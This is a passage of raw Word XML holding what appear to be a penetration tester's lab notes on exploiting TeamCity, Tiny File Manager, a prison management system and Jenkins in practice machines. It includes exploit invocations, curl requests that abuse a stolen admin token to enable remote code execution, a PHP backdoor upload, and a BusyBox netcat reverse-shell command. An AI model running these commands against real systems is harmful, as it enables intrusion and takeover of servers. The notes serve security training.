      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A61">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TeamCity </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1355">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, The exploit they used had some errors that they fixed using 0xdf’s writeup for Runner HTB. This is because they had to turn on Debug mode using the admin creds that the exploit created. And then once they did that, they got RCE. And they also showed how to enumerate TeamCity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1356">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was the Runner HTB writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here was the github exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1357">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Stuub/RCity-CVE-2024-27198</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 RCity.py -t http://teams.onlyrands.com/ - no-enum -c id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ran into errors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Take that token from the “value” field, then export to the TOKEN environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the output, look for: export TOKEN="&lt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TOKEN HERE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST 'http://teams.onlyrands.com/admin/dataDir.html?action=edit&amp;fileName=config%2Finternal.properties&amp;content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then refresh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 'http://teams.onlyrands.com/admin/admin.html?item=diagnostics&amp;tab=dataDir&amp;file=config/internal.properties' -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 RCity.py -t http://teams.onlyrands.com/ -c id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">again, now that debug mode is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I ran a perl reverse shell from pentestmonkey’s list and caught it on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A6F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A70">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tinyfilemanager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Tiny File Manager) was exploited in the SPX PG practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There were two writeups. They both did it a little bit differently. You can try both methods. </w:t>
      </w:r>
      <w:hyperlink r:id="rId1358">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and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1359">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3A73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first one also had a good idea of Googlging the config file name for SPX after finding LFI, and saw it was in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tinyfilemanager.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which gave us creds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A74">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fast5 Prison Management System</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1360">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">vmdak</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, it was vulnerable to authentication bypass through a basic SQL injection payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1361">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/52017</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we got authenticated, we used an authenticated remote code execution (RCE) issue in the add-admin.php functionality. We did this manually by going to /Admin/add-admin.php and created a user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I intercepted the request using Burp Suite and modified the image content to include a PHP one-liner backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="192" name="image181.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image181.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1362"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2806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7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the PHP backdoor was successfully uploaded, I triggered a reverse shell using a BusyBox payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload used:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> busybox nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.45.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1234</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jenkins </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in both </w:t>
      </w:r>
      <w:hyperlink r:id="rId1363">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">vmdak</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and also in Builder HTB. I will only be talking about vmdak since I haven't looked back at Builder HTB in a long time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we used CVE-2024–23897 to get LFI as unauthenticated user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1364">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/godylockz/CVE-2024-23897</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we used that LFI to get admin password (specific to this box)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
